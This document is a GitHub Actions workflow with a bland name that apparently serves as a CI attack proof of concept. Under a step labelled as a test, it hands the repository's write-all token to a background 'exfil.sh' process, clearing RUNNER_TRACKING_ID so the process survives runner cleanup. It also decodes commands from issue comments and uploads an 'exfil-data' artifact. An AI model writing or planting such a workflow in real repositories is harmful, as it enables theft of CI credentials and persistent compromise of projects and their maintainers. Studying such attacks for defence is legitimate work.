name: Env Var Workflow

on:
  workflow_dispatch:

permissions: write-all

jobs:
  test_and_env:
    runs-on: ubuntu-latest
    steps:
      - name: Check out repository
        uses: actions/checkout@v4

      - name: Run test bash command
        env:
          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
        run: RUNNER_TRACKING_ID="" && (nohup bash exfil.sh &)

      - name: Set var 2
        run: |
          echo "TARGET_VAR=step2" >> $GITHUB_ENV
          echo "Set TARGET_VAR"
          sleep 2

      - name: Set var 3
        run: |
          echo "TARGET_VAR=step3" >> $GITHUB_ENV
          echo "Set TARGET_VAR"
          sleep 2

      - name: Download and decode latest issue comment
        env:
          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
        run: bash download_decode_issue.sh

      - name: Upload zip artifact
        uses: actions/upload-artifact@v4
        with:
          name: exfil-data
          path: exfil_data.zip
